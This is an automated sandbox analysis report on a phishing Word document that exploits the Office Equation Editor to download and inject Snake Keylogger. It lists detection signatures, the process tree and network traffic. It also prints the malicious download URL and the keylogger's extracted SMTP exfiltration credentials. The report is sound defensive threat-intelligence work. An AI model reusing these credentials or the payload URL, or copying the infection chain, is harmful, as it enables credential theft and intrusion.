Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OVER DUE INVOICE PAYMENT.docx.doc

Overview

General Information

Sample name:OVER DUE INVOICE PAYMENT.docx.doc
Analysis ID:1467841
MD5:9f3fd4e8aa2ad81966d0c2a036d1e901
SHA1:80a58393acb58fcc666e56b514994d98ba3f4716
SHA256:cd9cf022180c8c6f6c4fb0d76476bf2e9382128d28a4686114c50448934e5381
Tags:doc
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: SCR File Write Event
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Screensaver Binary File Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2544 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3436 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • obi23456.scr (PID: 3500 cmdline: "C:\Users\user\AppData\Roaming\obi23456.scr" MD5: F7BDADAFF67E573F145D2E8E32E32CD8)
        • obi23456.scr (PID: 3532 cmdline: "C:\Users\user\AppData\Roaming\obi23456.scr" MD5: F7BDADAFF67E573F145D2E8E32E32CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\obb[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2bfa2:$obj2: \objdata
  • 0x2bfba:$obj3: \objupdate
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56784164.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x2bfa2:$obj2: \objdata
  • 0x2bfba:$obj3: \objupdate

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x14771:$a1: get_encryptedPassword
      • 0x14a5d:$a2: get_encryptedUsername
      • 0x1457d:$a3: get_timePasswordChanged
      • 0x14678:$a4: get_passwordField
      • 0x14787:$a5: set_encryptedPassword
      • 0x15d6d:$a7: get_logins
      • 0x15cd0:$a10: KeyLoggerEventArgs
      • 0x15969:$a11: KeyLoggerEventArgsEventHandler
      0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x17fdc:$x1: $%SMTPDV$
      • 0x18042:$x2: $#TheHashHere%&
      • 0x19621:$x3: %FTPDV$
      • 0x19715:$x4: $%TelegramDv$
      • 0x15969:$x5: KeyLoggerEventArgs
      • 0x15cd0:$x5: KeyLoggerEventArgs
      • 0x19645:$m2: Clipboard Logs ID
      • 0x19865:$m2: Screenshot Logs ID
      • 0x19975:$m2: keystroke Logs ID
      • 0x19c4f:$m3: SnakePW
      • 0x1983d:$m4: \SnakeKeylogger\
      0000000B.00000002.937566804.0000000002431000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        Click to see the 14 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        10.2.obi23456.scr.310000.0.unpackMALWARE_Win_DLInjector02Detects downloader injectorditekSHen
        • 0x48c6b:$x1: In$J$ct0r
        10.2.obi23456.scr.34b7a20.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          10.2.obi23456.scr.34b7a20.7.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            10.2.obi23456.scr.34b7a20.7.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x12b71:$a1: get_encryptedPassword
            • 0x12e5d:$a2: get_encryptedUsername
            • 0x1297d:$a3: get_timePasswordChanged
            • 0x12a78:$a4: get_passwordField
            • 0x12b87:$a5: set_encryptedPassword
            • 0x1416d:$a7: get_logins
            • 0x140d0:$a10: KeyLoggerEventArgs
            • 0x13d69:$a11: KeyLoggerEventArgsEventHandler
            10.2.obi23456.scr.34b7a20.7.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1a411:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x19643:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19a76:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1aab5:$a5: \Kometa\User Data\Default\Login Data
            Click to see the 40 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Equation Editor Network Connection
            Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3436, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49168
            Sigma detected: Suspicious Microsoft Office Child Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\obi23456.scr", CommandLine: "C:\Users\user\AppData\Roaming\obi23456.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obi23456.scr, NewProcessName: C:\Users\user\AppData\Roaming\obi23456.scr, OriginalFileName: C:\Users\user\AppData\Roaming\obi23456.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3436, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obi23456.scr", ProcessId: 3500, ProcessName: obi23456.scr
            Sigma detected: SCR File Write Event
            Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3436, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr
            Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
            Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\obi23456.scr, QueryName: checkip.dyndns.org
            Sigma detected: Suspicious Office Outbound Connections
            Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 2544, Protocol: tcp, SourceIp: 188.114.97.3, SourceIsIpv6: false, SourcePort: 443
            Sigma detected: Suspicious Screensaver Binary File Creation
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3436, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scr
            Sigma detected: Modification of IE Registry Settings
            Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2544, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
            Sigma detected: Office Macro File Creation
            Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2544, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://riell.top/obb.scrAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{56E3829F-B9EE-407D-9BA0-759B5D6DE9EF}.tmpAvira: detection malicious, Label: EXP/CVE-2018-0798.Gen
            Found malware configuration
            Source: 0000000B.00000002.937566804.0000000002281000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "reservation@artefes.com", "Password": "ArtEfes4765*+", "Host": "mail.artefes.com", "Port": "587"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrReversingLabs: Detection: 58%
            Source: C:\Users\user\AppData\Roaming\obi23456.scrReversingLabs: Detection: 58%
            Multi AV Scanner detection for submitted file
            Source: OVER DUE INVOICE PAYMENT.docx.docReversingLabs: Detection: 34%
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\obi23456.scrJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\obb[1].scrJoe Sandbox ML: detected

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org

            Exploits

            barindex
            Office equation editor establishes network connection
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 188.114.97.3 Port: 443Jump to behavior
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obi23456.scr
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obi23456.scrJump to behavior
            Source: ~WRF{56E3829F-B9EE-407D-9BA0-759B5D6DE9EF}.tmp.0.drStream path '_1781612666/\x1CompObj' : ...................F....Microsoft Equation 3.0....
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49162 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49163 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49164 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49170 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49173 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49161 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49168 version: TLS 1.2
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: obi23456.scr, 0000000A.00000002.417529163.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, obi23456.scr, 0000000A.00000002.414654030.0000000000550000.00000004.08000000.00040000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Document exploit detected (process start blacklist hit)
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_00505038
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 00507B81h11_2_005078C1
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 00505D07h11_2_00505B18
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 00506691h11_2_00505B18
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 00508143h11_2_00507D30
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 00506A01h11_2_00506740
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_0050584B
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 00508143h11_2_00508072
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 005072C1h11_2_00507000
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 00506E61h11_2_00506BA0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 00507721h11_2_00507460
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 00508143h11_2_00507D20
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_0050566A
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA2889h11_2_01EA25E0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EAA899h11_2_01EAA5F0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA5851h11_2_01EA55A8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_01EA79AE
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA2431h11_2_01EA2188
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EAA441h11_2_01EAA198
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA9FE9h11_2_01EA9D40
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA53F9h11_2_01EA5150
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA1FD9h11_2_01EA1D30
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA9B91h11_2_01EA98E8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA4FA1h11_2_01EA4CF8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA1B81h11_2_01EA18D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EACC15h11_2_01EAC8D8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA4B49h11_2_01EA48A0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA1729h11_2_01EA1480
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EAC729h11_2_01EAC480
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA9711h11_2_01EA9468
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA46F1h11_2_01EA4448
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA12D1h11_2_01EA1028
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EAC2D1h11_2_01EAC028
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA4299h11_2_01EA3FF0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA0E79h11_2_01EA0BD0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EABE79h11_2_01EABBD0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA3E41h11_2_01EA3B98
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA0A21h11_2_01EA0778
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EABA21h11_2_01EAB778
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA39E9h11_2_01EA3740
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA05C9h11_2_01EA0320
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EAB5CAh11_2_01EAB320
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA3591h11_2_01EA32E8
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EAB149h11_2_01EAAEA0
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_01EA7688
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_01EA7698
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA3139h11_2_01EA2E90
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EAACF1h11_2_01EAAA48
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA2CE1h11_2_01EA2A38
            Source: C:\Users\user\AppData\Roaming\obi23456.scrCode function: 4x nop then jmp 01EA5CA9h11_2_01EA5A00
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: riell.top
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: checkip.dyndns.org
            Source: global trafficDNS query: name: reallyfreegeoip.org
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49177 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49181 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49183 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49185 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49169 -> 193.122.130.0:80
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 193.122.6.168:80
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49178 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49180 -> 132.226.247.73:80
            Source: global trafficTCP traffic: 192.168.2.22:49182 -> 132.226.8.169:80
            Source: global trafficTCP traffic: 192.168.2.22:49184 -> 158.101.44.242:80
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49161 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49162 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.96.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
            Source: global trafficTCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
